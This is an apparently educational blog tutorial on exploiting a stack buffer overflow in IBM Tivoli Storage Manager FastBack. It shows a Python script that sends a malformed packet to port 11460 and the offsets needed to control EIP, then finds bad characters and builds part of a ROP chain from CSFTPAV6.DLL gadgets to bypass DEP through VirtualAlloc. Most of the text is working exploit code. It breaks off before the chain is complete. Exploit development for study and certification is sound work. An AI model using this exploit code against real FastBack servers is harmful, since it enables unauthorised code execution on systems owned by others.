Background

This article grew out of my personal notes and hands-on experience while pursuing the Windows Exploit Development certification. I wrote it both as personal documentation and to address the lack of available references on Windows exploitation, especially on techniques for bypassing existing Windows protection mechanisms.

This series will continue with several additional topics that I have already prepared in draft form. The drafts are based on my personal notes and will gradually be turned into well-structured articles that are easy to read and understand, especially for those who want to explore these topics further. This article is also available in Bahasa Indonesia on the overhack publication page at medium.com/overhack - feel free to check it out!

Technical Overview

In this article, we will discuss Buffer Overflow vulnerabilities in IBM Tivoli Storage Manager FastBack versions 5.5.x and 6.x ≤ 6.1.1 as a case study. The main focus of this article is not just basic exploitation, but how we can bypass memory protection in Windows 10, specifically Data Execution Prevention (DEP).

We will use the Return-Oriented Programming (ROP) technique to call a Windows API. Although several APIs are commonly used to bypass DEP (such as VirtualProtect and WriteProcessMemory), this time we will focus on VirtualAlloc (VirtualAllocStub) to allocate a memory region of the running process (for example, the stack) and set its permissions so that our code can be executed.

No Mona No Problem!

Although this process can actually be completed automatically using plugins such as mona.py, in this discussion we will try a manual approach by building a ROP chain from scratch. This means that we will write each ROP gadget one by one to form a complete chain in order to achieve our exploitation goals.

Vulnerability Analysis

Since we already know that the application has a published buffer overflow vulnerability, we will skip the reverse engineering and fuzzing processes. We can directly refer to the exploit database to speed up the process, so we can focus fully on the exploitation stage and bypass the current memory protection.

EDB-ID: https://www.exploit-db.com/exploits/38980

CODE | 18

# The vulnerability is a stack buffer overflow in the _FXCLI_GetConfFileChunk 
# function caused by the insecure usage of _sscanf while parsing user-controlled 
# input.
#
.text:0057898E      lea     eax, [ebp+var_210]
.text:00578994      push    eax
.text:00578995      lea     ecx, [ebp+var_108]
.text:0057899B      push    ecx
.text:0057899C      lea     edx, [ebp+var_20C]
.text:005789A2      push    edx
.text:005789A3      lea     eax, [ebp+var_4]
.text:005789A6      push    eax
.text:005789A7      lea     ecx, [ebp+var_104]      <=== Buffer that will be overwritten
.text:005789AD      push    ecx
.text:005789AE      push    offset $SG128635 ; "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d"
.text:005789B3      mov     edx, [ebp+Src]
.text:005789B6      push    edx             ; Src   <=== Buffer under our control
.text:005789B7      call    _sscanf                 <=== Stack Buffer Overflow!!!

In short, the vulnerability stems from an unsafe call to sscanf when processing user input in the FXCLI_GetConfFileChunk function: the %s conversion in the format string has no width limit, so the File field is copied into a fixed-size stack buffer without any bounds check. If we send more data than the buffer can hold, the application crashes and we can control EIP by overwriting the return address on the stack.

Vulnerability Validation

The first step is to validate the issue by running the following script, which deliberately sends more data than the target buffer can hold so that we can observe in the debugger exactly how the application responds to the overflow.

CODE | 33

import socket
import sys
from struct import pack

#psAgentCommand
buf = bytearray([0x41]*0xC)
buf += pack("<i", 0x534)  # opcode
buf += pack("<i", 0x0)    # 1st memcpy: offset
buf += pack("<i", 0x500)  # 1st memcpy: size field
buf += pack("<i", 0x0)    # 2nd memcpy: offset
buf += pack("<i", 0x100)  # 2nd memcpy: size field
buf += pack("<i", 0x0)    # 3rd memcpy: offset
buf += pack("<i", 0x100)  # 3rd memcpy: size field
buf += bytearray([0x41]*0x8)
# psCommandBuffer
formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (b"A"*0x200,0,0,0,0)
buf += formatString
# Checksum
buf = pack(">i", len(buf)-4) + buf
def main():
    if len(sys.argv) != 2:
        print("Usage: %s <ip_address>\n" % (sys.argv[0]))
        sys.exit(1)
    server = sys.argv[1]
    port = 11460
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((server, port))
    s.send(buf)
    s.close()
    print("[+] Packet sent")
    sys.exit(0)
if __name__ == "__main__":
    main()

After we run the script, the payload causes the application to crash, and the extended instruction pointer (EIP) register is overwritten with the pattern “AAAA” (0x41414141).

This condition shows that the EIP value can be controlled through the data we enter, so that the program execution flow is under our control later on. In other words, at this stage we have validated and proven that this application is vulnerable to buffer overflow.

Getting the Offset

Even though we can control the program’s execution flow, we still don’t know exactly which part of the buffer overwrites EIP. To find the exact offset, we create a unique cyclic pattern of 0x200 bytes (512 in decimal) using msf-pattern_create.

CODE | 1

msf-pattern_create -l 0x200

Next, we replace the buffer that was previously filled with the character “A” (0x41) with the unique pattern that has been generated. The goal is that when the program crashes, the EIP value will contain part of the pattern, which can then be analyzed to determine the accurate EIP offset position within the buffer.

After sending the cyclic pattern, the application crashes again. This time, the debugger shows that the EIP register has been overwritten with a specific hexadecimal value from the pattern we sent (for example, 0x41326a41).

We can use the msf-pattern_offset tool to calculate the exact distance from the start of the buffer to the point where EIP is overwritten.

CODE | 2

$ msf-pattern_offset -q  41326a41
[*] Exact match at offset 276

The result is an exact match at offset 276, meaning that we need 276 bytes of padding before the 4 bytes that overwrite EIP, which is where we will place the first address that controls the program’s execution flow.
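For readers who want to see what the two Metasploit tools are doing, the lookup can be approximated in a few lines of Python. This is a minimal sketch, assuming the pattern follows the familiar uppercase/lowercase/digit triplet scheme ("Aa0Aa1Aa2..."); cyclic_pattern and pattern_offset are illustrative helper names, not part of any tool.

```python
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits
from struct import pack


def cyclic_pattern(length):
    """Build an 'Aa0Aa1Aa2...' style pattern, truncated to `length` bytes."""
    out = bytearray()
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(out) >= length:
            break
        out += (upper + lower + digit).encode()
    return bytes(out[:length])


def pattern_offset(register_value, length):
    """Return the offset of a 32-bit register value inside the pattern, or -1."""
    # The register shows the four pattern bytes in little-endian order.
    needle = pack("<L", register_value)
    return cyclic_pattern(length).find(needle)


eip_offset = pattern_offset(0x41326A41, 0x200)
print(eip_offset)
```

Fed the EIP value from the crash above, the helper should agree with msf-pattern_offset; the same function can be reused for the dword that ESP points to.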

The next step is to find out where our data is located in memory. In most cases, the ESP register will point to the stack area that contains the rest of the buffer after EIP.

By checking the value pointed to by ESP at the time of the crash and analyzing it again using msf-pattern_offset, we get a value of 280. This indicates that ESP points to the area 4 bytes after EIP, which is exactly the beginning of the additional data we sent.

Once we know the EIP and ESP offsets, we can update our exploit script to reflect the correct structure.

CODE | 7

# psCommandBuffer
offset = b"A" * 276
eip = b"B" * 4
rop = b"C" * (0x400 - 276 - 4)

formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset+eip+rop,0,0,0,0)
buf += formatString

At this point, we can control EIP and have space for our payload.

Identify Bad Characters

Next, we need to identify characters that the application cannot process correctly, whether null bytes (0x00), new lines (0x0A), spaces (0x20), or other characters that receive special treatment. Knowing the bad characters from the start is very important because we will work extensively with ROP gadget addresses later, and a single corrupted byte in the payload would cause a crash midway through the chain.

To detect them, we place every byte value from 0x01 to 0xFF into the buffer and send it to the application:

CODE | 27

# psCommandBuffer
offset = b"A" * 276
eip = b"B" * 4 # Overwrite EIP; replace with a gadget address later

# Badchars string 
badchars = (
  b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
#rop = b"C" * (0x400 - 276 - 4)
formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset + eip + badchars,0,0,0,0)
buf += formatString

After the payload is sent and the application crashes, we check the contents of the stack in the debugger. The goal is to confirm that the entire sequence of bytes appears in order, without any missing or altered characters.

To view the stack area, we can use commands such as db esp - 10 L20 or dd esp, and then compare the output with the byte sequence we sent.

Every byte that is missing or altered is classified as a bad character and must be avoided in subsequent payloads.
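The comparison itself is easy to get wrong by eye, so it can help to script it. The sketch below is only an illustration: first_bad_byte is a hypothetical helper, and the observed bytes are a made-up dump in which the data read back from the stack stops after 0x08.

```python
def first_bad_byte(expected, observed):
    """Return the first expected byte that is missing or altered, or None."""
    for index, byte in enumerate(expected):
        if index >= len(observed) or observed[index] != byte:
            return byte
    return None


expected = bytes(range(0x01, 0x100))
# Hypothetical dump: the bytes copied out of the debugger stop after 0x08.
observed = bytes.fromhex("0102030405060708")
print(hex(first_bad_byte(expected, observed)))
```

After each run, the reported byte is removed from the list that is sent and the check is repeated until the function returns None.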

In the debugger output, bytes 0x01 to 0x08 are written to memory intact. However, 0x09 does not appear, so we can assume that 0x09 is a bad character. We therefore remove it from the list, rerun the script, and repeat the same process to find the next bad character:

CODE | 18

badchars = (
  b"\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

After rerunning the script, the buffer again stops at 0x08, which suggests that 0x0A, 0x0B, 0x0C, and 0x0D are also bad characters. We continue this process step by step until every byte has been tested.

After completing the iterative process, we determined that the following characters corrupt the buffer: 0x00, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, and 0x20.

CODE | 19

# Badchars string (0x00, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20)
badchars = (
  b"\x01\x02\x03\x04\x05\x06\x07\x08\x0e\x0f\x10"
  b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
  b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
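Typing the byte list by hand makes it easy to leave a known bad character in by accident. As a small sketch, the same test string can be generated from the list of bad characters found above; BAD_CHARS and build_test_bytes are names chosen here for illustration.

```python
# Bytes reported as bad characters in this walkthrough.
BAD_CHARS = bytes([0x00, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20])


def build_test_bytes(bad=BAD_CHARS):
    """Return every byte value 0x00-0xFF except the ones listed in `bad`."""
    return bytes(value for value in range(0x100) if value not in bad)


badchars = build_test_bytes()
print(len(badchars))
```

Passing a shorter list as bad reproduces the intermediate test strings used during the iterative search.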

Identifying Modules for ROP Chain

The next step is to locate the PE (Portable Executable) files or modules loaded by the application that may be useful in creating a ROP chain. The criteria are that we need modules that do not have memory protection such as ASLR, Rebase, or CFG. To verify this, we can use debugger extensions such as Narly (for WinDbg) or Mona.py (for Immunity Debugger).

Based on the obtained output, the main process module (FastBackServer) cannot be used because its base address starts with 0x00, which means it contains a NULL byte. The presence of this NULL byte can potentially terminate our payload prematurely, so this module must be avoided. Therefore, we need to look for another module whose base address is sufficiently clean and free of NULL bytes.

According to the search results, there are four modules that are quite interesting and can be used:

CSFTPAV6.DLL
CSMTPAV6.DLL
CSNCDAV6.DLL
SNFS.DLL

In this scenario, we select CSFTPAV6.DLL because its base address is clean and contains no NULL bytes, which makes it a suitable source of gadgets.

CODE | 4

0:077> lm m CSFTPAV6
Browse full module list
start    end        module name
50500000 50577000   CSFTPAV6   (deferred)

Gadget Analysis and Extraction

After we have determined the target module, the next step is to analyze the module we selected (CSFTPAV6.DLL) to find the gadgets we will use. We can use the tool rp-win-x86.exe (rp++) to scan the instructions inside it with the following command: rp-win-x86.exe -f csftpav6.dll -r 5 > rop.txt

Note: The parameter -r 5 means we are searching for gadgets with a maximum length of 5 instructions, and the results are then saved into the file rop.txt

If we open the generated file, we can see that all gadget addresses start with 0x50. This confirms that choosing a module without null bytes in its base address was the right call at the module-selection stage.

As a more efficient alternative, we can also use the script find-gadgets.py created by epi.

The main advantage of this script is the ability to group gadgets and display them in a more organized way (with minimal garbage instructions before the final ret instruction). This makes the process of searching for specific gadgets much more effective than manually scanning through text files.
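If neither tool is at hand, a rough filter over the text output already goes a long way. The sketch below is not how find-gadgets.py works; it simply assumes that each line has the form "0xADDRESS: instr ; instr ; ret", as in the gadget lines quoted in this article (real rp++ output may carry extra trailing text), and it drops gadgets whose address contains a bad character. The second sample address is made up to show the filtering.

```python
import re
from struct import pack

BAD_CHARS = bytes([0x00, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20])
GADGET_LINE = re.compile(r"^(0x[0-9a-fA-F]{8}):\s*(.+)$")


def find_gadgets(lines, wanted, bad=BAD_CHARS):
    """Yield (address, text) for gadgets containing `wanted` at a usable address."""
    for line in lines:
        match = GADGET_LINE.match(line.strip())
        if not match:
            continue
        address = int(match.group(1), 16)
        text = match.group(2)
        if wanted not in text:
            continue
        # Skip addresses whose packed bytes would be mangled by the target.
        if any(byte in bad for byte in pack("<L", address)):
            continue
        yield address, text


# Sample lines in the assumed format; 0x50500920 is a made-up address.
sample = [
    "0x50501110: push esp ; push eax ; pop edi ; pop esi ; ret",
    "0x50500920: push esp ; pop esi ; ret",
    "0x5051579a: add eax, ecx ; ret",
]
hits = list(find_gadgets(sample, "push esp"))
for address, text in hits:
    print(hex(address), text)
```

In practice the lines argument would be the opened rop.txt file rather than a hard-coded list.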

With the collected gadget set, we can now start constructing the ROP chain itself. The main goal is to manipulate memory protection (e.g., changing the flag to PAGE_EXECUTE_READWRITE) or allocate executable memory so that our shellcode can run and successfully bypass DEP.

Constructing The ROP Chain Skeleton

After successfully collecting gadgets from CSFTPAV6, the next step is to chain them into a ROP chain. But before we start assembling it, we need to first understand the Windows API function we will be using.

The VirtualAlloc API Prototype

The first thing we need to know about VirtualAlloc is its function prototype. Based on Microsoft documentation, this function has the following prototype:

CODE | 6

LPVOID VirtualAlloc(  
  LPVOID lpAddress,        // 1. Memory address to allocate/change  
  SIZE_T dwSize,           // 2. Memory size  
  DWORD  flAllocationType, // 3. Allocation type (e.g., MEM_COMMIT)  
  DWORD  flProtect         // 4. Memory permissions (our target: PAGE_EXECUTE_READWRITE)  
);

Understanding the Stack Layout

In x86 architecture, when a function is called, its arguments must be arranged neatly on the stack in a specific order. Since here we are manipulating the program flow (not calling the function normally), we must create a fake stack frame.

The stack structure we must assemble manually is:

VirtualAlloc Address: The address of the function itself (this is what will go into EIP).
Return Address: The destination address after VirtualAlloc finishes executing (later we will point this to the shellcode).
Arguments: The four VirtualAlloc parameters (lpAddress, dwSize, flAllocationType, flProtect) arranged sequentially after the return address with appropriate values.

Building the Skeleton in Python

Since the entire stack structure must be constructed manually, we cannot directly fill in the actual values for every parameter. Addresses like VirtualAlloc and the shellcode position (lpAddress) are often dynamic (changing with every execution) or contain bad characters if inserted raw.

Therefore, as an initial step, we will fill those parameters with dummy values. These temporary values will later be overwritten (patched) dynamically using ROP gadgets after the ROP chain is fully constructed.

Here is the implementation:

CODE | 17


# Placeholder VirtualAlloc

va  = pack("<L", (0x45454545)) # [Function] Dummy VirtualAlloc address (to be patched)
va += pack("<L", (0x46464646)) # [Ret Addr] Shellcode return address (jump to the shellcode after VirtualAlloc returns)
va += pack("<L", (0x47474747)) # [Arg 1] Dummy lpAddress: shellcode location
va += pack("<L", (0x48484848)) # [Arg 2] Dummy dwSize: shellcode size
va += pack("<L", (0x49494949)) # [Arg 3] Dummy flAllocationType: (0x1000 / MEM_COMMIT)
va += pack("<L", (0x51515151)) # [Arg 4] Dummy flProtect: (0x40 / PAGE_EXECUTE_READWRITE)

# Adjust offset calculation to include the ROP skeleton
offset = b"A" * (276 - len(va))
eip = b"B" * 4
rop = b"C" * (0x400 - 276 - 4)

formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset + va + eip + rop,0,0,0,0)
buf += formatString

Verifying Stack Layout

To ensure all values land on the stack in the correct positions, we run the updated skeleton script and inspect the stack in WinDbg using the command: dd esp - 1C

Based on the verification results, it appears that the lpAddress parameter (0x47474747) and flAllocationType parameter (0x49494949) are not loaded correctly because they were overwritten by null bytes from previous string operations. However, we can temporarily ignore this issue, as these values will be replaced with valid values through ROP gadgets before the VirtualAlloc function is executed.

Preparing the Stack

The next step is to replace (patch) the six dummy values (placeholders) we prepared earlier before executing VirtualAlloc.

The first thing we need to do is find out the current stack address, specifically the position of the dummy values we are going to fill, so that those dummy values can be referenced and manipulated by ROP gadgets in the subsequent steps.

Saving Extended Stack Pointer Address

The most common way to get this address is to use the ESP register during exploitation.

Since ESP points to the location of the next gadget execution, we cannot directly modify its value. As a solution, we need to copy the ESP value to another register so it can be used as a reference without disrupting the ESP flow itself.

Gadget Selection

Ideally, we need a gadget that can copy ESP to another general-purpose register such as EAX, ESI, EBX, or EDI. Unfortunately, direct instruction patterns like mov eax, esp ; ret are rarely available in a module. Therefore, a combination of push and pop instructions is often the best alternative.

After searching in the CSFTPAV6.DLL module, we found the following gadget that can be used to copy ESP to the ESI register:

CODE | 1

0x50501110: push esp ; push eax ; pop edi ; pop esi ; ret

Considering that the stack principle is LIFO (Last In, First Out), below is how the instructions in the gadget work:

push esp : Store the ESP value (the current stack address) on the stack.
push eax : Store the EAX value on the stack (this value is now at the top position).
pop edi : Take the top value from the stack (the EAX value) and put it into the EDI register.
pop esi : Take the next value from the stack (the ESP value that we saved at the beginning) and put it into the ESI register. At this point, our target is reached (ESI = ESP).
ret : Take the next return address from the stack to continue execution with the next gadget.
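To make the LIFO behaviour concrete, the gadget can be traced with a toy model of the stack. This is only a sketch: run_gadget is a hypothetical helper, the register and stack values are illustrative, and the model assumes that push esp stores the value ESP had before the push.

```python
def run_gadget(regs, memory):
    """Emulate: push esp ; push eax ; pop edi ; pop esi ; ret (32-bit stack slots)."""
    def push(value):
        regs["esp"] -= 4
        memory[regs["esp"]] = value

    def pop():
        value = memory[regs["esp"]]
        regs["esp"] += 4
        return value

    push(regs["esp"])    # push esp: stores ESP as it was before the push
    push(regs["eax"])    # push eax: EAX is now on top of the stack
    regs["edi"] = pop()  # pop edi: EDI receives the saved EAX value
    regs["esi"] = pop()  # pop esi: ESI receives the saved ESP value
    regs["eip"] = pop()  # ret: the next dword on the stack becomes EIP
    return regs


entry_esp = 0x0D59E31C                # illustrative stack address at gadget entry
memory = {entry_esp: 0x43434343}      # the dword that follows the gadget address
regs = {"esp": entry_esp, "eax": 0, "edi": 0, "esi": 0, "eip": 0x50501110}
run_gadget(regs, memory)
print(hex(regs["esi"]), hex(regs["eip"]), hex(regs["esp"]))
```

In this model ESI ends up equal to the ESP value at gadget entry, and the ret consumes the following dword as the address of the next gadget.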

Basically, by mapping ESP to ESI, we already have a static reference to point to the stack position. The next step is to update the skeleton script by replacing the value of the EIP variable with the address of this gadget.

Verifying the Gadget

After updating the skeleton script, we run the exploit again and set a breakpoint at that gadget address to verify the flow in the debugger.

From the debugger output, we can see that ESI now holds a copy of ESP, which indicates that the gadget worked as expected.

Exploring Alternative Gadgets

Are we restricted to using only the previous gadget to copy the ESP value? The answer is of course not. Everything depends on the availability of gadgets in existing modules.

In this case, we can use another gadget, for example push esp ; sub eax, 0x20 ; pop ebx ; ret from the SNFS.DLL module to copy ESP to another register (EBX).

CODE | 1

.\rp-win-x86.exe -f snfs.dll -r 5 > rop.txt

Interestingly, although this gadget contains the arithmetic instruction sub eax, 0x20 in the middle, that instruction only changes EAX and does not affect the stack slot that holds the ESP value we just pushed. So, when the pop ebx instruction is executed, the ESP value stored on the stack is still copied intact to the EBX register.

After running it, we can verify in the debugger that the EBX register now holds the same value as ESP.

In short, when constructing a ROP chain, we can use any gadget as long as it helps achieve our goal. There are no strict rules, and we are free to be creative in finding alternative paths as long as the result remains stable and reliable.

However, keep in mind that every memory address or instruction used must not contain bad characters or null bytes.

Retrieving VirtualAlloc Pointer from IAT

As noted earlier, we must obtain the address of VirtualAlloc dynamically while the exploit is running. This is necessary because of ASLR (Address Space Layout Randomization) and differences between Windows versions, which cause function addresses in kernel32.dll to change every time the system reboots. Therefore, we cannot hardcode this function address directly in our skeleton script.

So instead, we can retrieve the function address from the Import Address Table (IAT) of the CSFTPAV6.dll module. The IAT stores the real addresses of API functions imported by the module. Even though the VirtualAlloc address changes, the IAT entry address pointing to that function remains static as long as the module is loaded. This way, we can rely on the IAT as a stable reference in our ROP chain.

Finding the IAT Address

We can use IDA Free/Pro to check the IAT of the loaded module or look directly from the debugger to find where CSFTPAV6.DLL stores the pointer to VirtualAlloc.

From our check, we found that the address 0x5054A220 is the IAT entry for VirtualAlloc.

Calculating the Stack Offset for VirtualAlloc

Currently, we have a stack pointer in the ESI register and also know that we have inserted the dummy value 0x45454545 as a placeholder for the VirtualAlloc address into the stack.

Now, we need to calculate the distance (offset) between the current ESI position and that placeholder position on the stack. From the calculation in the debugger, we see a difference of 0x1C bytes. This means the first dummy value is located 0x1C bytes “below” (at a lower address than) the current ESP position.

In other words, if we want to access this dummy value, we must perform an arithmetic operation to shift the stack address down by 0x1C bytes so it points exactly to the placeholder address.

CODE | 9

0:062> dd esp - 0x1c
0d59e300  45454545 46464646 00000000 48484848
0d59e310  00000000 00000000 0d59e31c 43434343
0d59e320  43434343 43434343 43434343 43434343
0d59e330  43434343 43434343 43434343 43434343
0d59e340  43434343 43434343 43434343 43434343
0d59e350  43434343 43434343 43434343 43434343
0d59e360  43434343 43434343 43434343 43434343
0d59e370  43434343 43434343 43434343 43434343

We already copied the ESP value to ESI in the previous step, so our target now is to perform the operation ESI = ESI - 0x1C so that ESI points exactly to that placeholder address. Unfortunately, a simple gadget like sub esi, 0x1c ; ret is not available in the CSFTPAV6.DLL module. Therefore, we need to find a more creative alternative to achieve the same goal.

Handling Null Bytes via Negative Offsets

One possible approach is to place the value 0x1C on the stack, pop it into another register (e.g., EAX), and then subtract the registers (SUB ESI, EAX). However, this approach has a limitation because the 32-bit value 0x0000001C contains null bytes (00).

These null bytes would be treated as a string terminator, which would truncate our payload. Therefore, we avoid using this value directly and rely on the two’s complement representation instead.

CODE | 10

0:062> .formats 0x1C
Evaluate expression:
  Hex:     0000001c
  Decimal: 28
  Octal:   00000000034
  Binary:  00000000 00000000 00000000 00011100
  Chars:   ....
  Time:    Wed Dec 31 16:00:28 1969
  Float:   low 3.92364e-044 high 0
  Double:  1.38338e-322

We can reverse the logic: instead of subtracting the positive value 0x1C, we add the negative value -0x1C. In two’s complement representation, -0x1C is stored as the 32-bit value 0xFFFFFFE4, which, crucially, is free of null bytes.

CODE | 10

0:062> .formats -0x1C
Evaluate expression:
  Hex:     ffffffe4
  Decimal: -28
  Octal:   37777777744
  Binary:  11111111 11111111 11111111 11100100
  Chars:   ....
  Time:    ***** Invalid
  Float:   low -1.#QNAN high -1.#QNAN
  Double:  -1.#QNAN
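The same conversion can be checked outside the debugger. The sketch below masks the value to 32 bits to obtain the two's complement encoding, confirms that the encoded form is free of bad characters, and shows that adding it wraps around to a subtraction. The helper names are illustrative, and the saved stack address is the one implied by the dd esp - 0x1c output shown earlier.

```python
from struct import pack

BAD_CHARS = bytes([0x00, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20])


def to_u32(value):
    """Return the 32-bit two's complement encoding of a (possibly negative) integer."""
    return value & 0xFFFFFFFF


def is_clean(value, bad=BAD_CHARS):
    """True when none of the four packed bytes is a bad character."""
    return not any(byte in bad for byte in pack("<L", to_u32(value)))


negative_offset = to_u32(-0x1C)
print(hex(negative_offset), is_clean(0x1C), is_clean(-0x1C))

# Adding the encoded value wraps around 32 bits and behaves like a subtraction.
saved_esp = 0x0D59E31C
placeholder = to_u32(saved_esp + negative_offset)
print(hex(placeholder))
```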

Once we have the negative value, the next step is to add it to the ESP address that we saved earlier in ESI. Since registers like EAX and ECX usually have more gadget variations for operations like ADD, POP, or MOV, it is more practical to perform the calculation using those registers.

The approach or plan is roughly like this:

Copy the stack pointer value (currently in ESI) to EAX.
Load the value -0x1C (0xFFFFFFE4) into the ECX register.
Perform the addition ADD EAX, ECX. The result (ESP + -0x1C) will be stored in EAX.
After that, copy the result from EAX back into ESI to keep our reference flow consistent.

Implementation of the ROP Chain

Below is the gadget chain to carry out our plan. For the first step, we need to copy the ESI register into EAX. After searching for gadgets, we found mov eax, esi ; pop esi ; retn.

CODE | 2

rop = pack("<L", (0x5050118e))  # mov eax,esi ; pop esi ; retn
rop += pack("<L", (0x42424242)) # Padding (Junk)

Because this gadget has an extra instruction (pop esi), we must add padding (junk data) after it so the execution flow stays correct. Basically, this pop esi instruction will “consume” 4 bytes of data from the stack. This situation is common, since it is very hard to find a perfect gadget without side effects.

Next, we use the pop ecx gadget to load our negative value.

CODE | 4

## Load Negative Offset (-0x1C) to ECX
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffe4)) # -0x1C (two's complement)

With the values ready in EAX and ECX, we just need to add EAX with ECX using the ADD EAX, ECX gadget and move the result into ESI for the next steps.

CODE | 5

## Add EAX and ECX (EAX = EAX + ECX)
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

## Move result back to ESI
rop += pack("<L", (0x50537d5b)) # push eax ; pop esi ; ret

At this point, ESI now points exactly to the placeholder location on the stack, ready for the next patching stages.

Patching VirtualAlloc Addresses

